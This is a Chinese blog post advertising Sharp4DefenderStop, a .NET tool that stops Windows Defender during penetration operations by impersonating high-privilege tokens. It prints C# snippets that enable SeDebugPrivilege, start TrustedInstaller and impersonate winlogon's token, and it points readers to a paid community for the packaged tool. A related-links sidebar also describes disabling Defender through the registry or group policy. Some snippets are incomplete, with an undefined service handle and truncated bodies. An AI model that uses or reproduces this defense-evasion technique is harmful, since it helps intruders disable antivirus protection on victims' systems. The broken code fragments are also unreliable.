.NET 一款关闭WindowsDefender的利器

最新推荐文章于 2024-07-12 17:41:53 发布
最新推荐文章于 2024-07-12 17:41:53 发布
阅读量1.8k 收藏 30
点赞数 56
文章标签: .net 安全 矩阵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/139588519
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4DefenderStop是一款基于令牌模拟技术的工具,内网渗透活动时可用此工具停止Windows Defender服务。原理上利用了从高权限TrustedInstaller服务中获取令牌的方法,实现了对Windows Defender服务的控制。本文将详细介绍其工作原理、核心代码以及使用方法。

图片

03原理和使用

Windows Defender是Windows系统的默认防护软件,具有较高的权限,无论是Adminstrators还是SYSTEM用户均无法直接停止它。而Sharp4DefenderStop通过以下步骤实现对Windows Defender服务的控制。具体实现流程可参考下图

图片

1. 获取SE_DEBUG_Privilege权限

首先,我们需要启用SE_DEBUG_Privilege权限,以便能够访问和操作其他高权限进程的令牌。代码片段如下所示。

public static bool EnableDebugPrivilege()
{
    try
    {
        bool retVal;
        TokPriv1Luid tp;
        IntPtr hproc = GetCurrentProcess();
        IntPtr htok = IntPtr.Zero;
        retVal = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out htok);
        retVal = LookupPrivilegeValue(null, "SeDebugPrivilege", ref tp.Luid);
        retVal = AdjustTokenPrivileges(htok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
    }

2. 启动TrustedInstaller

我们需要确保TrustedInstaller服务已启动,以便能够从中获取令牌。这里还是通过OpenSCManager函数打开服务控制管理器,并返回一个句柄,接着调用OpenService函数打开指定的TrustedInstaller服务,具体代码如下所示。

public static void start_trustedinstaller_service()
{
    IntPtr SCMHandle = OpenSCManager(null, null, 0xF003F);  
    if (SCMHandle == IntPtr.Zero)
    {
        Console.WriteLine("OpenSCManager failed!");
        return;
    } 
    bool bResult = StartService(schService, 0, null);
    if (bResult)
    {
        Console.WriteLine("TrustedInstaller service started!");
    }
    else
    {
        Console.WriteLine("TrustedInstaller service cannot be started!");
    }
}

3. 提升至SYSTEM权限

通过模拟winlogon进程的令牌,提升当前进程到SYSTEM权限。这里通过OpenProcessToken函数打开winlogon进程的访问令牌,再调用ImpersonateLoggedOnUser函数模拟指定令牌的用户。具体代码如下所示。

public static void escalate_to_system()
{
    Process[] processlist = Process.GetProcesses();
    IntPtr tokenHandle = IntPtr.Zero;
    foreach (Process theProcess in processlist)
    {
        if (theProcess.ProcessName == "winlogon")
        {
            bool token = OpenProcessToken(theProcess.Handle, TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_DUPLICATE, out tokenHandle);
            if(!token)
            {
                Console.WriteLine("OpenProcessToken Failed!");
                return;
            }
            else
            {
                token = ImpersonateLoggedOnUser(tokenHandle);
                Console.Write("User after impersonation: ");
                get_username();                        
            }
            CloseHandle(theProcess.Handle);
        }
    }
    CloseHandle(tokenHandle);
}
}

Sharp4DefenderStop通过模拟TrustedInstaller服务的令牌,实现了对Windows Defender服务的控制。它利用了操作系统的高权限服务和令牌模拟技术,在红队渗透测试和攻击活动中提供了强大的工具。工具已经打包在星球,感兴趣的朋友可以加入自取。

04推荐阅读

从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!

图片

图片

图片

图片

图片

图片

05欢迎加入.NET安全知识库

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。

 目前星球门票¥199,后期价格随着内容和质量的不断沉淀会适当提高,星球即将涨价,2024.06月份起 ¥239,因此越早加入越好! 

    目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

图片

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。

图片

图片

dot.Net安全矩阵
关注
  • 56
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安工具 | Windows便携式渗透测试环境PentestBox入门到进阶使用指南
WeiyiGeek 唯一极客IT知识分享
09-26 355
描述: PentestBox是一个基于Windows的便携式渗透测试环境, 它基于ConEmu 和 cmder进行设计的。它包含了许多常用的渗透测试工具和应用程序,如等。PentestBox的设计初衷是为了方便渗透测试人员在Windows系统上进行测试,无需进行复杂的安装和配置。它可以直接从USB驱动器或其他便携设备上运行,而不会对主机系统产生任何影响, PentestBox还提供了图形用户界面,使得渗透测试工作更加简单和直观。
Win10软件推荐
LeoK77的博客
02-07 2162
这篇博文是为了分享和记录一下我正在用的win10平台的一些软件,软件这种东西仁者见仁智者见智,适合我的不一定是适合你的,仅供参考。 浏览器 安装并首次完全更新完win10系统之后我做的第一件事:安装浏览器 这里推荐两款浏览器,分别是微软的新版Edge浏览器,和火狐浏览器。首先阐述一下我不使用旧版Edge的原因:我使用旧版Edge的时候,时常会出现用浏览器下载东西卡住的现象,虽然浏览器的本职工作不包括下载,但是一个系统刚安装好的时候,下载别的软件都是要通过浏览器的,而我多次重装系统的经验告诉我,旧版Edge的
关闭 Windows Defender
pureman_mega的博客
01-29 371
通过api关闭windows defender 服务
(转)彻底关闭 windows Defender
zx1323的博客
11-12 2798
百度上其他的方案试了没效果,标记下这篇文章 参考百度经验 https://jingyan.baidu.com/article/59a015e3702f57f7948865cb.html
.NET 一款利用内核驱动关闭AV/EDR的工具
ahhacker86的专栏
06-29 370
Sharp4Terminator是一款基于.NET实现的利器,通过加载内核驱动程序来关闭反病毒软件或EDR进程。工具支持远程下载驱动和本地加载两种方式,通过驱动程序关闭常见的反病毒软件和EDR进程。
免费的企业级正版Windows安全管理利器——System Center 2012 Endpoint Protection
wangchaoqi1985的博客
06-07 4583
在上一篇文章中我们谈到了win8以及win8.1中超炫的主动防御功能,在这篇文章中我将带领大家来到一个你可能不太熟悉的企业级安全管理利器 - System Center 2012 Endpo
高级安全防御利器Defender-Control
gitblog_00051的博客
03-26 903
高级安全防御利器Defender-Control 项目地址:https://gitcode.com/qtkite/defender-control 在当今的数字化世界中,网络安全已经成为每个人都不能忽视的重要议题。为了更好地保护我们的设备和数据,我们需要强大的安全工具。这里向大家推荐一个开源项目——Defender-Control,这是一个专为Windows系统设计的安全控制面板,它能够深度集成...
ATT&CK(一)
J1nmu的博客
05-14 173
ATT&CK
haneWIN搭建Win10 NFS服务器
热门推荐
程序员仓库
11-21 2万+
haneWIN搭建Win10 NFS服务器 文章目录haneWIN搭建Win10 NFS服务器1. 背景2. 工具:haneWIN2.1 软件运行与配置2.2 防火墙配置3. 挂载 1. 背景 之前一直用VMware虚拟机或者Docker容器进行嵌入式Linux学习,最近想试试Win10的Linux子系统WSL2。相较于虚拟机和Docker容器来说,WSL2应该还是有不少坑的,不过在最近的实践中,搭建百问网的IMX6ULL开发板编译环境算是比较顺利,u-boot和kernel都能顺利编译、运行。 驱动开发过
关闭Windows Defender Service工具
05-05
Windows Defender是微软为Windows操作系统内置的一款安全防护软件,主要用于防止病毒、间谍软件和其他恶意软件的侵害。它包括实时保护、扫描、防火墙以及账户保护等功能。然而,在某些情况下,用户可能需要暂时或...
Defender Control(一键关闭Windows Defender) 1.9
02-27
Windows Defender是Microsoft为Windows操作系统内置的一款安全防护软件,它提供了实时病毒防护、恶意软件扫描以及网络保护等功能。然而,有时用户可能因为特定的需求,比如运行某些兼容性较差的软件或者进行系统优化...
Windows Defender关闭工具
11-05
"Windows Defender关闭工具",如Defender Control v2.1,就是为了满足这种需求而设计的。 Defender Control是一款第三方工具,允许用户更方便地管理Windows Defender的状态。通过这款软件,用户可以轻松地启用或...
一键开启关闭Windows Defender.zip
04-26
Windows10系统中Windows Defender一键开启关闭工具
一键开启关闭Windows Defender
09-09
Windows Defender是微软在Windows 10操作系统中内置的一款安全防护软件,主要功能是提供反病毒、反间谍软件以及防火墙等保护措施。它能够实时监控系统中的活动,防止恶意软件对用户数据和系统的破坏。然而,对于某些...
记一次 .NET某上位视觉程序 离奇崩溃分析
一线码农的专栏
07-12 237
在大工控领域里,这是我见过第三例bit位翻转导致的程序崩溃,太无语了,恶魔到底是不是旁边的伺服电机?
通过.NET6 创建的ASP.NET Core webapi项目中没有 Startup 类和ConfigureServices 方法
weixin_67299857的博客
07-10 350
Startup.cs 作用就是,对项目中用到的 静态文件,管道,服务,日志,路由,数据库连接,过滤器的注册 等 所有的有关程序的启动运行中用到的。Startup.cs 类所需的所有对象都存在于 builder 对象中,因此我们可以将所需的对象传递给和方法。没有startup.cs可以手动新建一个Startup.cs类(
C# .net6使用Hangfire
最新发布
你要明白,任何问题都不是孤立存在的,一定有人曾经遇到过,并且已经有更好的解决办法了,只是我还不知道。我不应该在黑暗中独自前行,去重新发明轮子,也许我的顿悟,只是别人的基本功!我应该要站在巨人的肩膀上,学习更成熟的经验和方法,然后再来解决这个问题
07-12 334
Hangfire 是一个用于 .NET 的任务调度库,允许你在后台运行任务,而不需要依赖外部的任务队列服务或复杂的基础设施。它简化了后台任务的创建、调度和管理过程,使得在 .NET 应用程序中处理长期运行的任务变得更加容易和可靠。目前1.6+版本已支持.NET Core、.Net 5+。个人认为它最大特点在于内置提供集成化的控制台,方便后台查看及监控。
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 220
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网站的行为。
一键关闭windows defender安全中心
01-23
关闭Windows Defender安全中心可以利用注册表编辑器或者组策略编辑器来实现。 首先,打开注册表编辑器,依次定位到HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender路径下,如果没有Windows Defender相关的注册表项,则需要手动创建。在该路径下创建一个名为DisableAntiSpyware的DWORD值,数值设为1即可关闭Windows Defender安全中心。 另一种方法是通过组策略编辑器来关闭Windows Defender安全中心。首先按下Win + R组合键打开运行窗口,输入“gpedit.msc”并回车打开组策略编辑器,然后依次定位到Computer Configuration -> Administrative Templates -> Windows Components -> Windows Defender Antivirus路径下,找到“Turn off Windows Defender Antivirus”设置选项并双击打开,在弹出的窗口中选择“已启用”并点击确定即可关闭Windows Defender安全中心。 需要注意的是,关闭Windows Defender安全中心可能会导致系统安全性下降,建议在关闭前权衡利弊。另外,关闭Windows Defender安全中心可能需要管理员权限,确保你有足够的权限进行操作。 最后,关闭Windows Defender安全中心可能会暴露系统在网络安全上的问题,使用第三方防病毒软件时应当确保软件的安全性和可信度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值